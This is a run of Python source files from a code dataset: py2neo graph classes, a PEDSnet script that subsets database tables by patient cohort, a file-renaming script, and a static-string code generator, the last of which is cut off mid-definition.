self.__eq__(other)\n\n def __hash__(self):\n if self.bound:\n return hash(self.resource.uri)\n else:\n return PrimitiveRelationship.__hash__(self)\n\n @property\n def _id(self):\n \"\"\" The internal ID of this relationship within the database.\n \"\"\"\n if self.__id is None:\n self.__id = int(self.uri.path.segments[-1])\n return self.__id\n\n def bind(self, uri, metadata=None):\n \"\"\" Associate this relationship with a remote relationship. The start and\n end nodes will also be associated with their corresponding remote nodes.\n\n :arg uri: The URI identifying the remote relationship to which to bind.\n :arg metadata: Dictionary of initial metadata to attach to the contained resource.\n\n \"\"\"\n Entity.bind(self, uri, metadata)\n self.cache[uri] = self\n\n for node, position in [(self.start_node(), \"start\"), (self.end_node(), \"end\")]:\n if not isinstance(node, Node):\n continue\n new_node_uri = self.resource.metadata[position]\n if node.bound:\n node_uri = node.uri.string\n if new_node_uri != node_uri:\n raise BindError(\"%s node of relationship %r cannot be bound to \"\n \"%r when already bound to %r\" %\n (position.title(), self._id, new_node_uri, node_uri))\n else:\n node.bind(new_node_uri)\n\n @deprecated(\"Relationship.exists() is deprecated, use graph.exists(relationship) instead\")\n def exists(self):\n \"\"\" :const:`True` if this relationship exists in the database,\n :const:`False` otherwise.\n \"\"\"\n return self.graph.exists(self)\n\n @property\n def graph(self):\n \"\"\" The parent graph of this relationship.\n\n :rtype: :class:`.Graph`\n \"\"\"\n return self.dbms.graph\n\n @property\n @deprecated(\"Relationship.properties is deprecated, use dict(relationship) instead\")\n def properties(self):\n \"\"\" The set of properties attached to this relationship. Properties\n can also be read from and written to any :class:`Relationship`\n by using the index syntax directly. 
This means\n the following statements are equivalent::\n\n relationship.properties[\"since\"] = 1999\n relationship[\"since\"] = 1999\n\n \"\"\"\n if self.bound and \"properties\" in self.__stale:\n self.graph.pull(self)\n return dict(self)\n\n @deprecated(\"Relationship.pull() is deprecated, use graph.pull(relationship) instead\")\n def pull(self):\n \"\"\" Pull data to this relationship from its remote counterpart.\n \"\"\"\n self.graph.pull(self)\n\n @deprecated(\"Relationship.push() is deprecated, use graph.push(relationship) instead\")\n def push(self):\n \"\"\" Push data from this relationship to its remote counterpart.\n \"\"\"\n self.graph.push(self)\n\n @property\n def ref(self):\n \"\"\" The URI of this relationship relative to its graph.\n\n :rtype: string\n \"\"\"\n return \"relationship/%s\" % self._id\n\n def type(self):\n \"\"\" The type of this relationship.\n \"\"\"\n if self.bound and self._type is None:\n self.graph.pull(self)\n return self._type\n\n def unbind(self):\n \"\"\" Detach this relationship and its start and end\n nodes from any remote counterparts.\n \"\"\"\n try:\n del self.cache[self.uri]\n except KeyError:\n pass\n Entity.unbind(self)\n self.__id = None\n\n\nclass Path(PrimitivePath):\n \"\"\" A sequence of nodes connected by relationships that may\n optionally be bound to remote counterparts in a Neo4j database.\n\n >>> from py2neo import Node, Path\n >>> alice, bob, carol = Node(name=\"Alice\"), Node(name=\"Bob\"), Node(name=\"Carol\")\n >>> abc = Path(alice, \"KNOWS\", bob, Relationship(carol, \"KNOWS\", bob), carol)\n >>> abc\n \n >>> abc.nodes\n (,\n ,\n )\n >>> abc.relationships\n (,\n )\n >>> dave, eve = Node(name=\"Dave\"), Node(name=\"Eve\")\n >>> de = Path(dave, \"KNOWS\", eve)\n >>> de\n \n >>> abcde = Path(abc, \"KNOWS\", de)\n >>> abcde\n \n >>> for relationship in abcde.relationships():\n ... 
print(relationship)\n ({name:\"Alice\"})-[:KNOWS]->({name:\"Bob\"})\n ({name:\"Carol\"})-[:KNOWS]->({name:\"Bob\"})\n ({name:\"Carol\"})-[:KNOWS]->({name:\"Dave\"})\n ({name:\"Dave\"})-[:KNOWS]->({name:\"Eve\"})\n\n \"\"\"\n\n @classmethod\n def hydrate(cls, data, inst=None):\n \"\"\" Hydrate a dictionary of data to produce a :class:`.Path` instance.\n The data structure and values expected are those produced by the\n `REST API `__.\n\n :arg data: dictionary of data to hydrate\n :arg inst: an existing :class:`.Path` instance to overwrite with new values\n\n \"\"\"\n node_uris = data[\"nodes\"]\n relationship_uris = data[\"relationships\"]\n offsets = [(0, 1) if direction == \"->\" else (1, 0) for direction in data[\"directions\"]]\n if inst is None:\n nodes = [Node.hydrate({\"self\": uri}) for uri in node_uris]\n relationships = [Relationship.hydrate({\"self\": uri,\n \"start\": node_uris[i + offsets[i][0]],\n \"end\": node_uris[i + offsets[i][1]]})\n for i, uri in enumerate(relationship_uris)]\n inst = Path(*round_robin(nodes, relationships))\n else:\n for i, node in enumerate(inst.nodes()):\n uri = node_uris[i]\n Node.hydrate({\"self\": uri}, node)\n for i, relationship in enumerate(inst.relationships()):\n uri = relationship_uris[i]\n Relationship.hydrate({\"self\": uri,\n \"start\": node_uris[i + offsets[i][0]],\n \"end\": node_uris[i + offsets[i][1]]}, relationship)\n inst.__metadata = data\n return inst\n\n def __init__(self, *entities):\n entities = list(entities)\n for i, entity in enumerate(entities):\n if entity is None:\n entities[i] = Node()\n elif isinstance(entity, dict):\n entities[i] = Node(**entity)\n for i, entity in enumerate(entities):\n try:\n start_node = entities[i - 1].end_node()\n end_node = entities[i + 1].start_node()\n except (IndexError, AttributeError):\n pass\n else:\n if isinstance(entity, string):\n entities[i] = Relationship(start_node, entity, end_node)\n elif isinstance(entity, tuple) and len(entity) == 2:\n t, properties = entity\n entities[i] = Relationship(start_node, t, end_node, **properties)\n PrimitivePath.__init__(self, *entities)\n\n def __repr__(self):\n s = [self.__class__.__name__]\n if self.bound:\n s.append(\"graph=%r\" % self.graph.uri.string)\n s.append(\"start=%r\" % self.start_node().ref)\n s.append(\"end=%r\" % self.end_node().ref)\n s.append(\"order=%r\" % self.order())\n s.append(\"size=%r\" % self.size())\n return \"<\" + \" \".join(s) + \">\"\n\n def __str__(self):\n return xstr(self.__unicode__())\n\n def __unicode__(self):\n from py2neo.cypher import CypherWriter\n s = StringIO()\n writer = CypherWriter(s)\n writer.write_path(self)\n return s.getvalue()\n\n def append(self, *others):\n \"\"\" Join another path or relationship to the end of this path to form a new path.\n\n :arg others: Entities to join to the end of this path\n :rtype: :class:`.Path`\n \"\"\"\n return Path(self, *others)\n\n @property\n def bound(self):\n \"\"\" :const:`True` if this path is bound to a remote counterpart,\n :const:`False` otherwise.\n \"\"\"\n try:\n _ = self.dbms\n except BindError:\n return False\n else:\n return True\n\n @property\n @deprecated(\"Path.exists() is deprecated, use graph.exists(path) instead\")\n def exists(self):\n \"\"\" :const:`True` if this path exists in the database,\n :const:`False` otherwise.\n \"\"\"\n return self.graph.exists(*(self.nodes() + self.relationships()))\n\n @property\n def graph(self):\n \"\"\" The parent graph of this path.\n\n :rtype: :class:`.Graph`\n \"\"\"\n return self.dbms.graph\n\n def pull(self):\n 
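# Path.hydrate above rebuilds the alternating node/relationship sequence with a
# round_robin helper imported elsewhere in this module. A plausible minimal
# sketch of the behaviour it relies on here (an assumption, not the actual
# py2neo implementation): interleave N+1 nodes with N relationships.
def round_robin_sketch(nodes, relationships):
    for n, r in zip(nodes, relationships):
        yield n
        yield r
    yield nodes[-1]  # a path always has one more node than relationship

assert list(round_robin_sketch(["n0", "n1", "n2"], ["r0", "r1"])) == ["n0", "r0", "n1", "r1", "n2"]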
\"\"\" Pull data to all entities in this path from their remote counterparts.\n \"\"\"\n self.graph.pull(self)\n\n def push(self):\n \"\"\" Push data from all entities in this path to their remote counterparts.\n \"\"\"\n self.graph.push(self)\n\n @property\n def dbms(self):\n \"\"\" The root service associated with this path.\n\n :return: :class:`.DBMS`\n \"\"\"\n for relationship in self:\n try:\n return relationship.dbms\n except BindError:\n pass\n raise BindError(\"Local path is not bound to a remote path\")\n\n def unbind(self):\n \"\"\" Detach all entities in this path\n from any remote counterparts.\n \"\"\"\n for entity in self.relationships() + self.nodes():\n try:\n entity.unbind()\n except BindError:\n pass\n\n\ndef graphy(obj, entities=None):\n \"\"\" Cast a general Python object to a graph-specific entity,\n such as a :class:`.Node` or a :class:`.Relationship`.\n \"\"\"\n if obj is None:\n return None\n elif isinstance(obj, (Node, NodeProxy, Relationship, Path)):\n return obj\n elif isinstance(obj, dict):\n return node(obj)\n elif isinstance(obj, tuple):\n return relationship(obj, entities)\n else:\n raise TypeError(obj)\n\n\ndef node(obj):\n if obj is None or isinstance(obj, (Node, NodeProxy)):\n return obj\n\n def apply(x):\n if isinstance(x, dict):\n inst.update(x)\n elif is_collection(x):\n for item in x:\n apply(item)\n elif isinstance(x, string):\n inst.add_label(ustr(x))\n else:\n raise TypeError(\"Cannot cast %s to Node\" % obj.__class__.__name__)\n\n inst = Node()\n apply(obj)\n return inst\n\n\ndef relationship(obj, entities=None):\n\n def get_type(r):\n if isinstance(r, string):\n return r\n elif hasattr(r, \"type\"):\n return r.type()\n elif isinstance(r, tuple) and len(r) == 2 and isinstance(r[0], string):\n return r[0]\n else:\n raise ValueError(\"Cannot determine relationship type from %r\" % r)\n\n def get_properties(r):\n if isinstance(r, string):\n return {}\n elif hasattr(r, \"type\") and callable(r.type):\n return dict(r)\n elif hasattr(r, \"properties\"):\n return r.properties\n elif isinstance(r, tuple) and len(r) == 2 and isinstance(r[0], string):\n return dict(r[1])\n else:\n raise ValueError(\"Cannot determine properties from %r\" % r)\n\n if isinstance(obj, Relationship):\n return obj\n elif isinstance(obj, tuple):\n if len(obj) == 3:\n start_node, t, end_node = obj\n properties = get_properties(t)\n elif len(obj) == 4:\n start_node, t, end_node, properties = obj\n properties = dict(get_properties(t), **properties)\n else:\n raise TypeError(\"Cannot cast relationship from {0}\".format(obj))\n else:\n raise TypeError(\"Cannot cast relationship from {0}\".format(obj))\n\n if entities:\n if isinstance(start_node, integer):\n start_node = entities[start_node]\n if isinstance(end_node, integer):\n end_node = entities[end_node]\n return Relationship(start_node, get_type(t), end_node, **properties)\n","sub_path":"py2neo/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":54665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"400562668","text":"import logging\nimport time\nfrom pedsnetdcc.db import StatementSet, Statement\nfrom pedsnetdcc.dict_logging import secs_since\nfrom pedsnetdcc.transform_runner import add_indexes, drop_unneeded_indexes\nfrom pedsnetdcc.transform_runner import add_foreign_keys\nfrom pedsnetdcc.transform_runner import add_primary_keys\nfrom pedsnetdcc.utils import (get_conn_info_dict, combine_dicts, check_stmt_err, vacuum,\n stock_metadata, 
conn_str_with_search_path)\nfrom pedsnetdcc.not_nulls import set_not_nulls\nfrom pedsnetdcc.concept_group_tables import create_index_replacement_tables\nfrom pedsnetdcc import VOCAB_TABLES\nALTER_OWNER_SQL = 'alter table {0}.{1} owner to dcc_owner;'\nGRANT_TABLE_SQL = 'grant select on table {0}.{1} to {2}'\n\n\ndef run_subset_by_cohort(conn_str, model_version, source_schema, target_schema, cohort_table,\n concept_create=False, drug_dose=False, measurement=False, covid_obs=False, inc_hash=False,\n index_create=False, fk_create=False, notable=False, nopk=False, nonull=False,\n limit=False, owner='loading_user', force=False):\n \"\"\"Create SQL for `select` statement transformations.\n\n The `search_path` only needs to contain the source schema; the target\n schema is embedded in the SQL statements.\n\n Returns a set of tuples of (sql_string, msg), where msg is a description\n for the operation to be carried out by the sql_string.\n\n :param model_version: PEDSnet model version, e.g. 2.3.0\n :param str source_schema: schema in which the tables are locaated\n :param str target_schema: schema in which to create the subset\n :param str cohort_table: name of table that contains the cohort\n :param bool concept_create: if True, create the concept group tables\n :param bool drug_dose: if True, copy drug dose tables\n :param bool measurement: if True, copy measurement tables\n :param bool covid_obs: if True, copy covid observation table\n :param bool inc_hash: if True, include hash_token table\n :param bool index_create: if True, create indexes\n :param bool fk_create: if True, create fks\n :param bool notable: if True, don't create tables\n :param bool nopk: if True, don't create primary keys\n :param bool nonull: if True, don't set column not null\n :param bool limit: if True, limit permissions to owner\n :param str owner: owner of the to grant permissions to\n :param bool force: if True, ignore benign errors\n :returns: True if the function succeeds\n :rtype: bool\n \"\"\"\n\n logger = logging.getLogger(__name__)\n log_dict = combine_dicts({'model_version': model_version, },\n get_conn_info_dict(conn_str))\n logger.info(combine_dicts({'msg': 'starting subset by cohort'},\n log_dict))\n start_time = time.time()\n\n metadata = stock_metadata(model_version)\n stmts = StatementSet()\n\n table_list = []\n select_all = (\n 'location',\n 'location_fips',\n 'care_site',\n 'provider',\n 'specialty',\n 'lab_site_mapping'\n )\n special_handling = {\n 'visit_payer',\n 'fact_relationship',\n 'location_history',\n 'hash_token'\n }\n measurement_tables = {\n 'measurement_bmi',\n 'measurement_bmiz',\n 'measurement_ht_z',\n 'measurement_wt_z'\n }\n create_dict = {}\n grant_vacuum_tables = []\n\n # Initial pass for tables that all rows are selected or are based on person_id in cohort table\n if not notable:\n for table_name,table in metadata.tables.items():\n if table_name in VOCAB_TABLES:\n continue\n if table_name in special_handling:\n continue\n\n table_list.append(table_name)\n create = 'create table ' + target_schema + '.' + table_name + ' as select t.*'\n #for column_name,column in table.c.items():\n # create += 't.' + column_name + ', '\n #create = create[:-2]\n create = create + ' from ' + source_schema + '.' + table_name + ' t'\n if table_name not in select_all:\n create = create + ' join ' + target_schema + '.' 
+ cohort_table + ' c on c.person_id = t.person_id'\n create = create + ';'\n create_dict[table_name] = create\n grant_vacuum_tables.append(table_name)\n\n for table_name in sorted(table_list):\n create_stmt = Statement(create_dict[table_name])\n stmts.add(create_stmt)\n\n # Execute the statements in parallel.\n stmts.parallel_execute(conn_str)\n\n # Check for any errors and raise exception if they are found.\n for stmt in stmts:\n try:\n check_stmt_err(stmt, 'create initial tables')\n except:\n logger.error(combine_dicts({'msg': 'Fatal error',\n 'sql': stmt.sql,\n 'err': str(stmt.err)}, log_dict))\n logger.info(combine_dicts({'msg': 'create initial tables failed',\n 'elapsed': secs_since(start_time)},\n log_dict))\n raise\n logger.info({'msg': 'initial tables created'})\n\n # Create special handling tables\n del table_list[:]\n create_dict.clear()\n stmts.clear()\n\n for table_name,table in metadata.tables.items():\n if table_name in special_handling:\n table_list.append(table_name)\n create = 'create table ' + target_schema + '.' + table_name + ' as select t.*'\n #for column_name, column in table.c.items():\n # create += 't.' + column_name + ', '\n #create = create[:-2]\n create = create + ' from ' + source_schema + '.' + table_name + ' t'\n if table_name == 'fact_relationship':\n create = create + ' where exists(select 1 from ' + target_schema + '.visit_occurrence v'\n create = create + ' where t.domain_concept_id_1 = 8 and t.fact_id_1 = v.visit_occurrence_id)'\n create = create + ' or exists(select 1 from ' + target_schema + '.drug_exposure d'\n create = create + ' where t.domain_concept_id_1 = 13 and t.fact_id_1 = d.drug_exposure_id)'\n create = create + ' or exists(select 1 from ' + target_schema + '.measurement m'\n create = create + ' where t.domain_concept_id_1 = 21 and t.fact_id_1 = m.measurement_id)'\n create = create + ' or exists(select 1 from ' + target_schema + '.observation o'\n create = create + ' where t.domain_concept_id_1 = 27 and t.fact_id_1 = o.observation_id)'\n if table_name == 'location_history':\n create = create + ' join ' + target_schema + '.' + cohort_table + ' c on c.person_id = t.entity_id'\n if table_name == 'visit_payer':\n create = create + ' join ' + target_schema + '.visit_occurrence v on v.visit_occurrence_id = t.visit_occurrence_id'\n if table_name == 'hash_token':\n if inc_hash:\n create = create + ' join ' + target_schema + '.' 
+ cohort_table + ' c on c.person_id = t.person_id'\n else:\n create = create + ' where FALSE'\n create = create + ';'\n create_dict[table_name] = create\n grant_vacuum_tables.append(table_name)\n\n for table_name in sorted(table_list):\n create_stmt = Statement(create_dict[table_name])\n stmts.add(create_stmt)\n\n # Execute the statements in parallel.\n stmts.parallel_execute(conn_str)\n\n # Check for any errors and raise exception if they are found.\n for stmt in stmts:\n try:\n check_stmt_err(stmt, 'create special handling tables')\n except:\n logger.error(combine_dicts({'msg': 'Fatal error',\n 'sql': stmt.sql,\n 'err': str(stmt.err)}, log_dict))\n logger.info(combine_dicts({'msg': 'create special handling tables failed',\n 'elapsed': secs_since(start_time)},\n log_dict))\n raise\n logger.info({'msg': 'special handling tables created'})\n stmts.clear()\n\n # Add drug dose tables\n if drug_dose:\n del table_list[:]\n create_dict.clear()\n stmts.clear()\n drug_dose_tables = ['drug_exposures_mgkg_derivations','drug_exposures_mgkg_metadata']\n for table_name in drug_dose_tables:\n table_list.append(table_name)\n create = 'create table ' + target_schema + '.' + table_name + ' as select t.*'\n create = create + ' from ' + source_schema + '.' + table_name + ' t'\n if table_name == 'drug_exposures_mgkg_derivations':\n create = create + ' join ' + target_schema + '.' + cohort_table + ' c on c.person_id = t.person_id'\n if table_name == 'drug_exposures_mgkg_metadata':\n create = create + ' join ' + target_schema + '.drug_exposure d on d.drug_exposure_id = t.drug_exposure_id'\n create = create + ';'\n create_dict[table_name] = create\n grant_vacuum_tables.append(table_name)\n\n for table_name in sorted(table_list):\n create_stmt = Statement(create_dict[table_name])\n stmts.add(create_stmt)\n\n # Execute the statements in parallel.\n stmts.parallel_execute(conn_str)\n\n # Check for any errors and raise exception if they are found.\n for stmt in stmts:\n try:\n check_stmt_err(stmt, 'create drug dose tables')\n except:\n logger.error(combine_dicts({'msg': 'Fatal error',\n 'sql': stmt.sql,\n 'err': str(stmt.err)}, log_dict))\n logger.info(combine_dicts({'msg': 'create drug dose tables failed',\n 'elapsed': secs_since(start_time)},\n log_dict))\n raise\n logger.info({'msg': 'drug dose tables created'})\n stmts.clear()\n\n # Add measurement tables\n if measurement:\n del table_list[:]\n create_dict.clear()\n stmts.clear()\n for table_name in measurement_tables:\n table_list.append(table_name)\n create = 'create table ' + target_schema + '.' + table_name + ' as select t.*'\n create = create + ' from ' + source_schema + '.' + table_name + ' t'\n create = create + ' join ' + target_schema + '.' 
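# Each block above repeats the same build -> parallel_execute -> check_stmt_err
# -> log sequence. A hedged refactoring sketch (execute_sql_batch is a
# hypothetical helper, not part of pedsnetdcc) reusing the names already
# imported in this module:
def execute_sql_batch(conn_str, create_dict, task, logger, log_dict, start_time):
    stmts = StatementSet()
    for table_name in sorted(create_dict):
        stmts.add(Statement(create_dict[table_name]))
    stmts.parallel_execute(conn_str)
    for stmt in stmts:
        try:
            check_stmt_err(stmt, task)
        except:
            logger.error(combine_dicts({'msg': 'Fatal error', 'sql': stmt.sql,
                                        'err': str(stmt.err)}, log_dict))
            logger.info(combine_dicts({'msg': task + ' failed',
                                       'elapsed': secs_since(start_time)}, log_dict))
            raise
    logger.info({'msg': task + ' finished'})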
+ cohort_table + ' c on c.person_id = t.person_id'\n create = create + ';'\n create_dict[table_name] = create\n grant_vacuum_tables.append(table_name)\n\n for table_name in sorted(table_list):\n create_stmt = Statement(create_dict[table_name])\n stmts.add(create_stmt)\n\n # Execute the statements in parallel.\n stmts.parallel_execute(conn_str)\n\n # Check for any errors and raise exception if they are found.\n for stmt in stmts:\n try:\n check_stmt_err(stmt, 'create measurement tables')\n except:\n logger.error(combine_dicts({'msg': 'Fatal error',\n 'sql': stmt.sql,\n 'err': str(stmt.err)}, log_dict))\n logger.info(combine_dicts({'msg': 'create measurement tables failed',\n 'elapsed': secs_since(start_time)},\n log_dict))\n raise\n logger.info({'msg': 'measurement tables created'})\n stmts.clear()\n\n # Add COVID observation table\n if covid_obs:\n del table_list[:]\n create_dict.clear()\n stmts.clear()\n table_name = 'observation_derivation_covid'\n table_list.append(table_name)\n create = 'create table ' + target_schema + '.' + table_name + ' as select t.*'\n create = create + ' from ' + source_schema + '.' + table_name + ' t'\n create = create + ' join ' + target_schema + '.' + cohort_table + ' c on c.person_id = t.person_id'\n create = create + ';'\n create_dict[table_name] = create\n grant_vacuum_tables.append(table_name)\n\n for table_name in sorted(table_list):\n create_stmt = Statement(create_dict[table_name])\n stmts.add(create_stmt)\n\n # Execute the statements in parallel.\n stmts.parallel_execute(conn_str)\n\n # Check for any errors and raise exception if they are found.\n for stmt in stmts:\n try:\n check_stmt_err(stmt, 'create covid observation table')\n except:\n logger.error(combine_dicts({'msg': 'Fatal error',\n 'sql': stmt.sql,\n 'err': str(stmt.err)}, log_dict))\n logger.info(combine_dicts({'msg': 'create drug dose tables failed',\n 'elapsed': secs_since(start_time)},\n log_dict))\n raise\n logger.info({'msg': 'covid observation created'})\n stmts.clear()\n\n # Set up new connection string for manipulating the target schema\n new_search_path = ','.join((target_schema, 'vocabulary'))\n new_conn_str = conn_str_with_search_path(conn_str, new_search_path)\n\n if not nopk:\n # Add primary keys to the subset tables\n add_primary_keys(new_conn_str, model_version, force)\n\n if not nonull:\n # Add NOT NULL constraints to the subset tables (no force option)\n set_not_nulls(new_conn_str, model_version)\n\n if index_create:\n # Add indexes to the subset tables\n add_indexes(new_conn_str, model_version, force)\n\n # Drop unneeded indexes from the transformed tables\n drop_unneeded_indexes(new_conn_str, model_version, force)\n\n if fk_create:\n # Add constraints to the subset tables\n add_foreign_keys(new_conn_str, model_version, force)\n\n # Create concept index replacement tables normally done during merge.\n if concept_create:\n create_index_replacement_tables(new_conn_str, model_version)\n condition_tables = ['condition_occurrence_source_value', 'condition_occurrence_concept_name']\n drug_tables = ['drug_exposure_source_value','drug_exposure_concept_name']\n measurement_tables = ['measurement_source_value', 'measurement_concept_name']\n procedure_tables = ['procedure_occurrence_concept_name', 'procedure_occurrence_source_value']\n\n grant_vacuum_tables = grant_vacuum_tables + condition_tables + drug_tables + measurement_tables + procedure_tables\n\n # Grant permissions\n stmts.clear()\n logger.info({'msg': 'setting permissions'})\n if limit:\n users = (owner,)\n else:\n users = 
('achilles_user', 'dqa_user', 'pcor_et_user', 'peds_staff', 'dcc_analytics')\n for target_table in grant_vacuum_tables:\n # alter_stmt = Statement(ALTER_OWNER_SQL.format(target_schema, target_table))\n # stmts.add(alter_stmt)\n for usr in users:\n grant_stmt = Statement(GRANT_TABLE_SQL.format(target_schema, target_table, usr))\n stmts.add(grant_stmt)\n\n # Check for any errors and raise exception if they are found.\n for stmt in stmts:\n try:\n stmt.execute(conn_str)\n check_stmt_err(stmt, 'grant permissions')\n except:\n logger.error(combine_dicts({'msg': 'Fatal error',\n 'sql': stmt.sql,\n 'err': str(stmt.err)}, log_dict))\n logger.info(combine_dicts({'msg': 'granting permissions failed',\n 'elapsed': secs_since(start_time)},\n log_dict))\n raise\n logger.info({'msg': 'permissions set'})\n\n # Vacuum analyze tables for piney freshness.\n vacuum(new_conn_str, model_version, analyze=True, tables=grant_vacuum_tables)\n\n # Log end of function.\n logger.info(combine_dicts({'msg': 'finished subset by cohort',\n 'elapsed': secs_since(start_time)}, log_dict))\n\n # If reached without error, then success!\n return True\n\n\ndef run_index_replace(conn_str, model_version):\n \"\"\"Create index replacement tables\n\n :param model_version: PEDSnet model version, e.g. 2.3.0\n :returns: True if the function succeeds\n :rtype: bool\n \"\"\"\n\n logger = logging.getLogger(__name__)\n log_dict = combine_dicts({'model_version': model_version, },\n get_conn_info_dict(conn_str))\n logger.info(combine_dicts({'msg': 'starting subset by cohort'},\n log_dict))\n start_time = time.time()\n\n metadata = stock_metadata(model_version)\n stmts = StatementSet()\n\n # Create concept index replacement tables normally done during merge.\n\n create_index_replacement_tables(conn_str, model_version)\n\n # Log end of function.\n logger.info(combine_dicts({'msg': 'finished subset by cohort',\n 'elapsed': secs_since(start_time)}, log_dict))\n\n # If reached without error, then success!\n return True\n","sub_path":"pedsnetdcc/subset_by_cohort.py","file_name":"subset_by_cohort.py","file_ext":"py","file_size_in_byte":18168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"407153789","text":"import os\n\n# function to get list of files in directory\ndef list_of_files(mypath):\n\tfrom os import listdir\n\tfrom os.path import isfile, join\n\tfiles = [f for f in listdir(mypath) if (isfile(join(mypath, f)) and (f.endswith(\".png.txt\") or f.endswith(\".png\")))]\n\n\treturn files\n\nfiles = list_of_files(os.getcwd()+'/screenshots')\nfor file in files:\n\n\tprint(file)\n\tpath = os.getcwd()+'/screenshots/'+file\n\tnew_path = os.getcwd()+'/screenshots/'+'night_'+file\n\n\tos.rename(path, new_path)\n\nfiles = list_of_files(os.getcwd()+'/data')\nfor file in files:\n\n\tprint(file)\n\tpath = os.getcwd()+'/data/'+file\n\tnew_path = os.getcwd()+'/data/'+'night_'+file\n\t\n\tos.rename(path, new_path)\n\n\n\t","sub_path":"Assets/night_image_renamer.py","file_name":"night_image_renamer.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"230596262","text":"import json\nimport collections\n\n# In all the string formats, we use the following placeholders:\n# {0} = indentation (tabs)\n# {1} = unqualified member or group name (simple identifier)\n# {2} = dotted member path, including the member's own name\n# {3} = underscored member path, including the member's own name\n# {4} = length of string in 
UTF-16 code units (not available for groups)\n# {5} = string data, as a string of comma-separated UTF-16 code units,\n# with a trailing zero (not available for groups)\nCONFIG = {\n 'INPUT_FILE': 'staticstrings.json',\n 'HEADER': {\n 'PLACEHOLDERS': {\n 'DATA_MEMBERS': '/*@DataMembers@*/',\n 'STRING_MEMBERS': '/*@StringMembers@*/',\n },\n 'FORMATS': {\n 'DATA_MEMBER': '{0}LitString<{4}> {3};',\n 'STRING_MEMBER': '{0}::String *{1};',\n 'GROUP_START': '{0}struct {1}Strings {{',\n 'GROUP_END': '{0}}} {1};',\n },\n 'TEMPLATE': 'staticstrings.template.h',\n 'OUTPUT': 'staticstrings.h',\n },\n 'SOURCE': {\n 'PLACEHOLDERS': {\n 'DATA_VALUES': '/*@StringData@*/',\n 'STRING_INITIALIZERS': '/*@StringInitializers@*/'\n },\n 'FORMATS': {\n 'DATA_VALUE': '{0}{{ {4}, 0, StringFlags::STATIC, {5} }},',\n 'STRING_INITIALIZER': '{0}this->{2} = reinterpret_cast(&data->{3});',\n },\n 'TEMPLATE': 'staticstrings.template.cpp',\n 'OUTPUT': 'staticstrings.cpp',\n },\n}\n\ndef generate_files(config):\n string_data = _parse_json(config['INPUT_FILE'])\n header_config = config['HEADER']\n source_config = config['SOURCE']\n\n members = init_members(string_data)\n\n header_template = _read_all_text(header_config['TEMPLATE'])\n formatted_header = format_header(\n header_template,\n members,\n header_config['PLACEHOLDERS'],\n header_config['FORMATS']\n )\n\n source_template = _read_all_text(source_config['TEMPLATE'])\n formatted_source = format_source(\n source_template,\n members,\n source_config['PLACEHOLDERS'],\n source_config['FORMATS']\n )\n\n _write_all_text(header_config['OUTPUT'], formatted_header)\n _write_all_text(source_config['OUTPUT'], formatted_source)\n\nclass MemberDefinition:\n def __init__(self, path, name):\n self.path = path\n self.name = name\n\n def dotted_path(self):\n return self.joined_path('.')\n\n def underscored_path(self):\n return self.joined_path('_')\n\n def joined_path(self, sep):\n return sep.join(self.path + (self.name,))\n\nclass GroupDefinition(MemberDefinition):\n def __init__(self, path, name, children):\n super(GroupDefinition, self).__init__(path, name)\n self.group = True\n self.children = children\n self._format_args = None\n\n def __iter__(self):\n yield from self.children\n\n def format_args(self):\n if self._format_args is None:\n self._format_args = (self.name, self.dotted_path(), self.underscored_path())\n return self._format_args\n\nclass StringDefinition(MemberDefinition):\n def __init__(self, path, name, value):\n super(StringDefinition, self).__init__(path, name)\n self.group = False\n self.value = value\n self._format_args = None\n\n def format_args(self):\n if self._format_args is None:\n utf16 = self.to_utf16()\n self._format_args = (\n self.name,\n self.dotted_path(),\n self.underscored_path(),\n len(utf16),\n ','.join(map(str, utf16 + [0]))\n )\n return self._format_args\n\n def to_utf16(self):\n utf16_bytes = self.value.encode('utf-16le');\n code_units = []\n for i in range(0, len(utf16_bytes), 2):\n code_units.append(utf16_bytes[i] + (utf16_bytes[i + 1] << 8))\n return code_units\n\ndef init_members(string_data):\n def get_members(path, entries):\n members = []\n\n for k, v in entries.items():\n if isinstance(v, dict):\n group_children = get_members(path + (k,), v)\n member = GroupDefinition(path, k, group_children)\n else:\n member = StringDefinition(path, k, v)\n members.append(member)\n\n return members\n\n return get_members((), string_data)\n\ndef _iter_flattened(members):\n for m in members:\n if m.group:\n yield from _iter_flattened(m.children)\n else:\n 
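# StringDefinition.to_utf16 above pairs little-endian bytes by hand. A
# standalone cross-check of that pairing against array-based decoding (assumes
# array('H') has a 2-byte itemsize, which holds on typical platforms):
import array
import sys

def to_utf16_via_array(value):
    units = array.array('H', value.encode('utf-16le'))  # 'H' = unsigned 16-bit
    if sys.byteorder == 'big':
        units.byteswap()  # the bytes are little-endian regardless of the host
    return list(units)

sample = 'Ovum\u00e9'
pairs = zip(*[iter(sample.encode('utf-16le'))] * 2)
manual = [lo + (hi << 8) for lo, hi in pairs]
assert manual == to_utf16_via_array(sample)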
yield m\n\ndef format_header(template, members, placeholders, formats):\n data_members = []\n string_members = []\n data_member_format = formats['DATA_MEMBER']\n string_member_format = formats['STRING_MEMBER']\n group_start_format = formats['GROUP_START']\n group_end_format = formats['GROUP_END']\n\n # Data members\n for member in _iter_flattened(members):\n format_args = ('\\t',) + member.format_args()\n data_members.append(data_member_format.format(*format_args))\n\n # String members\n def format_string_member(member, indent):\n format_args = (indent,) + member.format_args()\n if member.group:\n string_members.append(group_start_format.format(*format_args))\n for m in member:\n format_string_member(m, '\\t' + indent)\n string_members.append(group_end_format.format(*format_args))\n else:\n string_members.append(string_member_format.format(*format_args))\n\n for member in members:\n format_string_member(member, '\\t')\n\n template = template.replace(placeholders['DATA_MEMBERS'], '\\n'.join(data_members))\n template = template.replace(placeholders['STRING_MEMBERS'], '\\n'.join(string_members))\n\n return template\n\ndef format_source(template, members, placeholders, formats):\n data_values = []\n string_initers = []\n\n data_value_format = formats['DATA_VALUE']\n string_initer_format = formats['STRING_INITIALIZER']\n\n for member in _iter_flattened(members):\n format_args = ('\\t',) + member.format_args()\n data_values.append(data_value_format.format(*format_args))\n string_initers.append(string_initer_format.format(*format_args))\n\n template = template.replace(placeholders['DATA_VALUES'], '\\n'.join(data_values))\n template = template.replace(placeholders['STRING_INITIALIZERS'], '\\n'.join(string_initers))\n\n return template\n\ndef 